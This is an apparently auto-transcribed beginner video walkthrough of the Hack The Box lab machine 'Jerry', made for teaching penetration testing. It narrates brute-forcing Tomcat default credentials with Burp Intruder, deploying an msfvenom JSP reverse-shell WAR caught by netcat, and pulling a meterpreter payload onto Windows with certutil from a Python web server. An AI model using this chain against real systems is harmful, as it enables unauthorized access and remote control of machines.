Pentesting for n00bs: Episode 5 - Jerry

Key Takeaways

hello hello hello welcome to another episode of pentesting for noobs you are now on episode 5 if you've made it this far congratulations you are a determined individual so today's machine is going to be Jerry Jerry leaves at ten ten ten ninety five so if you're not already on this site go ahead and go to hack the box see you go over here to your all machines and scroll down to Jerry and hit the play button once you've got that all set up let's go ahead and get Jerry scanning so I'm gonna open up a new terminal here and we'll do our typical scan install where I scan it we'll talk about it until the scan comes back and then we'll look at the scan so you can go ahead and use your favorite scan method you should know mine by now very straightforward here and we'll let that run so let's talk about Jerry Jerry is a Windows machine as we can see here and historically Jerry is one of the most rooted and easier machines on hack the Box we can see here that it's got twelve thousand user owns and routes and we can see from the rest that I mean the next closest in this list is eight thousand right so by far Jerry is one of the most rooted if not the most rooted machines so while it's easy it does not mean that it does not have important lessons to teach us the most important lesson we're going to learn today is about default credentials why are default credentials so bad and why are they so common still I run into default credentials as a pen tester all the time on the external web in my history I have run into Cisco Cisco on a default credential on a Cisco router leading to internal network access I have got domain admin off of a printer with default credentials on an internal network I've gotten reversed shells of default credentials on internal net so default credentials can lead to some very very bad things and you're going to see an example of that today on top of that what we're gonna be doing is we're going to be doing some bash scripting we'll do a little bit of brute forcing we're gonna be using verb sweet today there's a lot of cool tactics that I can show you that are going to just improve our learning process on top of that I'll talk about some manual exploitation for this machine will use msf venom generate some shell code but we'll use netcat to actually get in the machine and then we'll talk about file transfers and how to improve so we have a lot to learn from a very very basic box so let's go ahead and just take a look at the scan now so our scan came back and 65,535 ports were filtered that is great why is that great that means we only have one port to focus on here and that port is 8080 now there are some situations where there might be hidden ports like port knocking but for a machine this easy on hacker box I'm not thinking that that's the path so when we're looking at 8080 that says hey vulnerability for sure somewhere on 8080 that's where you're going to get in so we've got some version information here we could see a patchy Tomcat with a JSP engine of 1.1 we can also see a patchy tomcat version number here of 7.0 point eight eight so as we've talked about before this is perhaps a default web page we're getting a lot of Tomcat information here and if it's not a default web page why are they disclosing their server headers with service information you know that's just a no-no we would write this up on a pen test report as a finding so there are some things that we can do off off the bat here you know my first decision is always to go to the web page and see what I'm working with but if we do want to we can also Google something like Apache Tomcat 7.0 point eight eight exploit and see if there's any exploits out there we could do the same for this JSP engine and see if there's any exploits for that that would be version exploits right before we do that or we're not actually going to get into before we did that my step would always be to go out to the web page just to see what's going on and in this instance we're working with port 8080 so we're gonna go out and we're just going to go to 10.10 10.95 you can see I have it here with the port 8080 at the end go ahead and hit enter and we are brought to this apache tomcat page now this is this is not a good page to be leaving open or even if it's on the the internal network but if this is on the external this is bad you'll find this on external networks people will tuck it away under like slash manager or slash admin or whatever because this over here on the side is what gets you into the admin panels so you do see this a lot this apache tomcat is very realistic and if there is any sort of guessable credentials on on this side of the house oh it's it's game over and you're gonna find out why so this would be a finding too depending on what you're doing if this is external this is like hey why do you have this up you know you should put this behind a VPN so that only you can access it when you're on the internal side don't leave this open on the external network on the internal side you know is this is this viel and off who has access to this page why do they have access to this page you don't want this easily accessible by any means so we're at this page and we have this manager app over here on the side now we can log in with the manager app and do some malicious things but before we can log in here one of the first things I do when I see a login on a login page like this with the service version I'm going right to Google I'm gonna say hey Google what's up let's talk about Apache Tomcat default credentials and let's see what we can pull up first thing that comes up is github right and we can come into github and github has this wonderful list because Tomcat has quite a few default credentials so what we can do is we can take this list and use it in a brute force now there are tools out there that will do this for I kind of want to get a little crafty today and teach us some manual methods I think that'll be more fun so what we're gonna do is we're going to fire up herb sweep and the new herb herb sweet airs out with this java air don't worry about it too much we're not going to worry about fixing it today I'll just work around it so we're gonna go ahead and just click Next in start burp with default now in order to get burp suite working there is this proxy here right and the proxy if we go actually into options tab it sits at 127.0.0.1 the home address on port 8080 and this is how we intercept traffic so we need to actually do that we need to go into our little hamburger menu here and go up to preferences or down to preferences scroll all the way down and at the very bottom is the network proxy we're gonna filter all of our traffic through burp suite right now you should be set to use system proxy settings go ahead and just select manual proxy configuration 127.0.0.1 here for 8080 here and click the box for use this proxy server for all protocols so it should look like this when it's all said and done ok so we'll hit OK on that and we'll test this out if we go back to the Apache Tomcat and we just hit enter it shouldn't load it should freeze here something should just be spinning if you look at your proxy proxy got intercepted what's going on well what's happening here is we intercepted the request in before we send it to the page we have the opportunity to modify it we can say instead of a get request here to put this as a post request we can get malicious in here we could do all sorts of things and this is where web app testing really becomes fun is when we start tampering and doing certain you know malicious activities with with these requests but for now let's just go ahead and forward it and you should see the page reloads perfect what we're after today is this manager app so if we click on manager app and you see that okay a freezes on manager let's just forward this request and see what happens all right so 10 10 10 95 80 80 it's asking us for credentials well there's 21 or so in that list but one I did remember was Tomcat Tomcat so let's try Tomcat Tomcat and just say okay now immediately this intercepts the request and a lot of times what you'll see is you'll see a username field and a password field here but we're actually getting this authorization basic and it looks like it's encoded with base64 you could usually tell this by the equal signs at the end typically so what we can do here is we can right-click on this and we can say send this to decoder is one option we're gonna do and you'll see your decoder tab lights up right and you come in here and you just scroll down and highlight this little area and let's see what it's doing well decode as over here and we'll just say base64 if we scroll down you can see it's just saying hey Tomcat : Tomcat so username : password is what it's attempting and let's go ahead and forward this and see what happens doesn't look like it worked right so we forwarded it and it didn't work okay we could try manager Tomcat or something along those lines and this time what we can do intercept it one more time we could do a couple different cool little things one is we could say hey send this to repeater and hey number to send this to intruder so we'll see both of our tabs light up if we look at repeater repeater just repeats requests we have the opportunity instead of sending it in real time with a proxy to come back over here and send the request and see what the response is so this is where we can kind of just play with certain requests and see how the server responds so if we hit go on this we can see that we got a 401 unauthorized so 401 means hey you did not get accessed here right so this set of credentials is incorrect and okay let's just go ahead and turn the intercept off we'll let this go will it cancel and then let's go ahead and try brute-forcing this because you know there's 20 something here right 30 lines it says 30 lines of passwords that's a lot of passwords so what we'll do is let's go into our new window okay and let me make this bigger and I'm gonna use G edit because I like G edit so let's just say G edit tommcatt text and what we'll do here is we will copy all these usernames and passwords and then paste them into here now select the space in between remember the format that we had we got to put this into base64 so what we're gonna do I guess I should explain that a little bit better is we sent our request to intruder if we come into positions here we see that our request is sitting here what intruder is going to do is do a brute force style attack based on the attack type that we select well the requests are coming through in base64 so we have to put these into base64 in that format that we saw see user name calling password so we're gonna do the same thing now is get this set up then we're gonna convert these to base64 and then we're gonna fire them off so first things first let's go back in here we've got this little space copy let's hit ctrl H that's our fine and replace let's go ahead and just paste that space here and what we're gonna do is we're going to just replace everything that has that kind of space with this colon we'll replace all and look how easy that was so now we've got a set list of credentials here that is actually 25 lines long and so we're gonna save this out and we're gonna write a little bash script so if you have never used any bash scripting one I recommend watching some videos if on bash scripting I've got a few on my channel if you watch the tail end of the Linux for ethical hackers course it's in there I've got individual videos on it as well pretty much typically the same lesson but the the importance of what you're about to see is called a for loop and for loops are awesome you see one line for loops a lot and that is very useful when it comes to pen testing so let's break down what we're going to do so we've got credentials in this list right we've got these credentials and we'll just take one for an example we want to convert this these credentials into base64 so one way we can do that is we can just echo and we say echo - n and we're gonna say I want to put that say Tomcat Tomcat right like that into base64 this is the command to do that and there it is now if we were to decode this this would come back out as Tomcat Tomcat okay that's cool but we've got a long list here in this Tomcat dot text and what we need to do is do this for everything in that list so let's write a for loop and we'll talk through it so I'm going to say for cred and you can call this whatever you want you call it Bob if you want but for cred it's our variable in and then we got to specify what we're what the credentials are and where they're at so every line here is going to be a credential in this loop and I'll explain it a little bit better detail but we're gonna cat out this Tomcat dot text meaning we're gonna print all the lines okay and what's gonna happen is we're going to do something we're going to do an echo - and for that credential and we're gonna pipe it into base64 and then we're gonna say done so what's happening here a for loop means you're going to do something for everything in that instance right so for the first line in Tomcat tags for the second line for the third line until you are completely done so for credential all we're saying is hey the first line we're gonna call that cred and then when that first line prints out and those cat we're gonna put it over here in this echo command put it through base64 and then we're we're gonna go back again in the second line we're gonna call that cred we're gonna do it again and then we're gonna go all the way through and base64 all of these and then it should print out and be done boom look at that okay so you've got all the credentials that we just put through in base64 format so what we're gonna do is just let's copy all these here and we're gonna go back in a burp suite now of course like I said there is a tool that's out there for this or you can manually type these but with so many default granules most websites only our most programs only have like two sets of default credentials but Tomcat for whatever reason has a lot but here we go we're in burp suite now in order to use intruder we need to set up what we're going to intrude on so here we need to set our payload parameter area we're gonna set the position of one here this is position one okay and we're saying hey everything here this is what we're gonna replace so we're gonna use a sniper attack and sniper just means one that's how you can think of it this is just one payload that we're gonna be sending off so if we go into payloads tab over here we can just hit paste on our list and you can see now it's gonna fire off 25 payloads what it's gonna do is it's going to replace the base64 that we highlighted with the base64 that's here one other thing that we need to take off here is this URL encoding it's going to attempt to URL encode these characters and in this instance if it tries to URL encode these equal signs is actually going to fail for us so it should be noted that we're also on a free community edition of burp suite thus it's going to be slower the Free Edition is very slow the Pro Edition very fast so we're gonna hit start attack and it's gonna say hey we're gonna slow this down just to be jerks and what's gonna happen here is we're going through all 25 requests right and you can see different status codes come through I mean that's what we're looking at we're looking at two things one we could sort by status code two we could sort by the length here now some advanced topics or tactics is when you're running through thousands say you're doing a username brute force and you're trying to find the one person that you know might have got through you can come through say on our response and you could see something in here that says like you are not authorized to view this page you can copy you are not authorized and you can paste it down into your payload rules here or option and say hey grep on this and then they'll have a little checkbox up here that says you are not authorized and it will check every time it comes through here and then you could just sort by that so if you click on these you can sort by different things right so length is a big one if length changes look how significant this length is here and you see the rest of these nothing any four hundred we don't really care about this one 403 for whatever reason forbidden access denied this one that might be a valid set of credentials but we don't have access to that application this one is a valid set of credentials that does look at the 200 status that means okay and on top of it we have a 17,000 link compared to 2000 or 3000 here so significant differences but in long lists it's better to grep on something like an error and then just sort by that err with the checkboxes to find you know maybe a different message that came through as opposed to just looking for length or status codes because you might get like a 302 redirect or something on a log and/or successful login okay so here we've got these credentials which these actually come out to Tomcat secret is how that played out so this is Tomcat secret in case you are curious okay and so that logged us in so let's go ahead and say no to these changes we know for sure that we're in so let's go to the page and what I'm gonna do for the rest of this time I'm gonna go ahead and turn off burp suite and these proxy settings and let's just log into the manager app with our newfound credentials and you could base decoded this I was just being lazy by the way you could come in here and say hey what is this cuz I have no idea I can't read this you can easily just go to decoder and decode that right and see that it's Tomcats secret okay so from here we are now in the application itself so if you've never been in a tomcat application they use something called war files okay war files are used to upload here and they deploy these applications you see manage or host manager examples blah blah blah what we can do is upload a malicious war file and get a reverse shell see there is a area here to upload a war file now this is your first time in the application and you're new and you're like oh man what am I doing here you say ok well I see that there's a war file I wonder if I can be malicious with that and then you might go and say war file reverse shell or something along those lines war file exploit and then you can see there's all kinds of articles that come through using Metasploit to create a war backdoor Apache Tomcat war backdoor so this is the kind of information that we're after a couple of things that we see down here that help us out as well is we see that we're running on a Windows Server 2012 r2 that means that we're likely running on 64-bit right this is r2 server and we get some information about the OS that's nice Oh AMD 64 is 64-bit so we picked up a little bit information hostname and IP address so a little bit information disclosure there as well that will help us when we're trying to make this this war file right so what we're gonna use is a MSF venom there's Tomcat war reverse shell at missive and let's click on that here this is good so this creating Metasploit payloads here this net sec WS is good there's a lot of cheat sheets out there for different ones this is a very nice cheat sheet that I like to go to as you can see I've already been to it before you could just go down the list like if this is a PHP site we can go to a PHP site and I think I've showed you this before for the ASP same thing here we're just using a war file and we're gonna generate this on our own so let's go ahead and let's ctrl L and if we see what it wants us to do let's just all this copy and paste it will be lazy okay and we'll paste it in now we have two options here right we can do the manual method which is what we're doing or we can do the Metasploit method we'll do the manual method today but we could change the payload to a a mature Peter payload and use the exploit handle or I'm Metasploit and get an exploit or Metasploit reverse shell easily okay so let's go back and let's just talk about what we're seeing MSF venom - P for payload we are running on Java on this platform now we're gonna be using a JSP shell reverse tcp notice all the underscores not the forwards this is getting sent all at once this is a unstaged payload not a staged payload so let's go ahead and enter in the IP address that we're gonna be using I actually don't know mine so I'll open up a new tab really quick and do the ifconfig or your IP a 10 not 10.14 dot 24 for me so we're gonna be listening on our IP address and you can listen in on the port of your choice I will just use the standard all fours on this machine and then we're going to generate this you and it takes just a second here okay we have generated a shell bot war file that means we need to be listening on this four four four four in order for this shell to come back to us let's go ahead and use netcat - NB LP so net cat is a listener slash connector it's a port tool it's it's amazing functionality what we're gonna be doing here is we're saying hey net cat I want to listen right now and again remember when we're doing reverse shell that just means somebody talks back to us all we have to do is listen so we're gonna be listening on all fours okay that's the part we're listening on now what's gonna happen is this is going to say we're gonna upload it and then it's gonna try to connect back to the IP the address that we supplied so let's go ahead and browse for that war file I put mine in my root folder and there it is shell dot war you say deploy we've deployed it you can see here that it is /l and we've got nothing yet but we can force this along and get that she'll by going to it and boom look at that it talked back to us we are so malicious okay so the best thing about this box also is Who am I authority system right off the bat and if we go to the users file I remember this from a long time ago if we say der actually desktop sorry and we say der we type you see it's flags or it might be is that that's the directory let's go to the flags directory and then do der and then two for the price of one they actually give you both flags here so the fact that there were people that only had they were there were more root zones and there were user owns for whatever reasons some people just decided they didn't want the user on this machine but both flags are sitting in there so I think that's funny anyway we're back in here okay we have system on this machine we can do all kinds of commands and look around right you know we can look at the ARP see who we're talking to if so our art - a we're not talking to anybody but ten - and ten dot 255 now this really isn't useful again this is just for your knowledge it's not gonna be very useful in a hack the box environment like this if you're doing like a lab environment super useful to see who it's talking to same thing with netstat same thing with the route route print on Windows so okay we found our Flags this is cool but we're still in that limited flexibility so let's go ahead and talk about how we can improve this shell again we're going to use Metasploit we're gonna do this a little bit outside the box this time so what I want to do is I want to create a reverse shell to this machine we're gonna generate a new reverse shell so we'll come into here and we'll we'll use MSF and I'm like before so we'll say MSF venom will do a payload here windows because we know it's a Windows machine x64 because we know it's 64-bit and we'll just say meterpreter and the little try shall reverse TCP and that may or may not work so we'll try stage and unstaged here our l host again is mine is 10.10 for teen dot 26 the l port is going to be let's do five five five five so we don't interfere with the all fours we're already on and then all we need is a file type which is exe and we'll put that into a shell always call SH DXE let that generate on top of that let's go ahead and go into Metasploit and we'll say hey Metasploit how you doing I want to run your exploit handler so this should look familiar from last time and it looks like I picked up a bad a bad shell here so maybe I don't know what I'm doing so let's go into use exploit multi handler and let's see what the name of that is so we'll say set payload and we'll say windows do a tab it's a little slow x64 meterpreter i think it's just maybe reverse tcp yeah it's not shell reverse tcp it's just reversed tcp and delete that regenerate it sorry and come back into here while that's regenerating we could say options and will this a set I'll host same thing we just specified 14.26 set l port all fives and now we're just going to run this and listen on it [Music] mmm said it failed to bind why is it failing to bind let's check our IP one more time 14 dot 24 guys I am screwing up so bad okay hopefully you're running the right IP address and you're not being like me I have to fix this payload really quick to be 24 I've been doing the offshore labs all week all last week and my IP addresses was a little bit different so that's kind of why I'm getting these numbers mixed up okay so we're running on this now and we are also running on the correct payload so how do we get a file onto a Windows machine well first and foremost we need to host a web server the easiest way to host a web server is with Python now we could just say Python m and we could say http/2 are a simple HTTP server on a T like this and that's going to load up a simple HTTP server so we're in here and now we're hosting up every single file that is in this root folder so that's a nice thing we've got instant access to everything that's here we can cut it out as soon as we want to and be done so we can go to our 10.10 14 dot 24 and see everything that i'm hosting here and then as soon as I don't want to host it anymore and you can see what's going on as well that's status commands awesome control see I come back and it's dead so it's just for as long as you need it so we've got the the shell now being hosted and when we talk about collecting a or transporting files on windows there is a tool that's on there now it's starting to get picked up by defender but for a long time they didn't so on assessments it still works fairly well what we can do here it's a built-in tool now everybody knows about W get for Linux this is my idea of the quick and dirty way of doing like a double you get four windows that's not very commonly well known so let's just go and say well just put down in the flag folder that's fine so we'll say cert util cert util if I could type and we're gonna say - URL cache meaning we're bringing over a file via URL we're gonna do a - F for the file never - say hey I want to grab 10.10 1424 slash sh t XE and while I'm at it let's put that file in users administrator desktop flags and we'll also call it sh d XE okay you can see it grabbed it we could say derp just to make sure okay sh t XE is in here and on top of it if we go to our file server you can see that sh t HC was actually retrieve a file server so this is nice when you're running like a blind payload on a web server and you don't know if it's actually downloading you could have a download something to see if you've got command execution like this and know for sure that something came through I ran into that this just this past weekend actually so from here we can just say SH exe run it and look what happened we now have a meterpreter reverse shell now in the real world this is going to be picked up fairly fairly easily I would imagine but you know we can oxy skate this more but in a situation like this or even a bad environment where they don't have good a be something like this is not gonna get picked up at all so this is just a nice way to show you like hey we can get an interpreter session and now we can just do a hash gum you know we have control over what we can do and we have a lot more flexibility again so yes it ends in meterpreter we went a very manual method of doing it we all so what do we learn today we learned default credentials are very bad and can lead to very bad things we learned that we can use some nifty little tricks in for loops and get something done very quick with some basic bash scripting we learned how to use burp suite we learned about repeater in the proxies and intruder a lot of cool features in there that we'll only dive into more as we go and we learned how to transfer files on a Windows machine to improve a shell and just you know get better overall so thank you again for for joining me for this lesson hopefully it was informative to you if you enjoy lesson please do hit subscribe please you know select that bell make sure you got notifications turned on and hit the like button as well tell a friend we're still growling it's been awesome guys working towards that I guess the next goal is 100k right we got a we got to work towards that get that silver play button and really really show off a little bit so thank you so much for joining me and until next time my name is TCM and thank you for having me [Music] you